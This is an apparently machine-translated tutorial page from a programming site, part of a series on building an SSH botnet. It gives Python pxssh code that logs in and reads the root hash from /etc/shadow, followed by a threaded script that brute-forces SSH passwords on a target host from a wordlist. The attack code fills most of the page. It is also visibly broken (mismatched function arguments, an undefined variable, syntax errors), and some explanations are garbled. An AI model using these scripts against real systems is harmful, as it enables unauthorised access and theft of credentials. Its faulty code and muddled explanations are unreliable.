程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

[advanced Python Script] 2.2. Build an SSH botnet (middle): use pxsh to brutally crack SSH passwords

編輯:Python

Catalog

One 、Pxssh Brute force SSH password

1.1、 function :

1.2、 Use Pxssh simplify

1.3、 function :

1.4、 automation


One 、Pxssh Brute force SSH password

1.1、 function :

prompt(): yes javascript A method in language , The main purpose is to display the prompt dialog box

pxssh The module is used in python in ssh Remote connection , Carry out orders , Return results , But don't support Windows System

1.2、 Use Pxssh simplify

use Pxssh Further simplify it ,Pxssb It's one that contains pexpect Special script for Library , It can be written in advance login()、logout() and prompt() Equifunction directly with SSH Interact . Use Pxssh You can simplify the last script into

import pxssh
def send_command(s, cmd):
s.sendline(cmd)
s.prompt()
print(s.before)
def connect(host, user, password):
try:
s = pxssh.pxssh()
s.login( host, user, password )
return s
except:
print('[-] Error Connecting')
exit( 0 )
s = connect ('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')

1.3、 function :

BoundedSemaphore(n): At most at the same time n Threads access specific resources

global: Overall

release: Release

add_option Add setting options

acquire The method is Python Lock class ,Python Thread module in Lock Class's built-in methods

Thread Is the execution thread in the program

1.4、 automation

With some more modifications, the script can automatically perform brute force cracking SSH Task of password . In addition to adding some parameter parsing code to read the hostname 、 The user name and the file containing the password to be tried , Only need to connect() Function slightly modified .


If login() Function executed successfully , And there's no exception thrown , A message will be printed , Indicates that the password has been found and sets the global Boolean value indicating that the password has been found to true. otherwise , The exception will be caught . If the exception shows that the password is rejected , Know this password is wrong , Just let the function return . however , If the exception shows socket by “ read_nonblocking", May be SSH The server was blown up by a large number of connections , You can wait a moment and try again with the same password . Besides , If the exception displays pxssh Command prompt extraction is difficult , You should also wait for a while , Then let it try again .


stay connect() There is a Boolean quantity in the parameter of the function release. because connect() You can recursively call another connect(), Must let only not by connect() Recursively called connect() Function can release connection_lock The signal .

import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print('[+] Password Found: ' + password)
Found = True
except Exception as e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep( 5 )
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep( 1 )
connect( host, user, password, False )
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser( 'usage %prog ' + '-H <target host> -u <user> -F <password list>' )
parser.add_option( '-H', dest= ' tgtHost', type='string', help=' specify target host')
parser.add_option( '-F', dest= ' passwdFile', type='string', help='specify password file')
parser.add_option( '-u', dest='user', type = 'string', help = 'specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user= options.user
if host== None or passwdFile = None or user = None:
print(parser.usage)
exit(0)
user = options.user
fn = open( passwdFile,'r')
user = options.user
for line in fn.readlines():
user = options.user
if Found:
print("[*] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Exiting: Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print("[-] Testing: " + str(password))
t = Thread(target=connect, args=(host, user, password, True))
child = t.start()
if __name__ == '__main__':
main()


  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved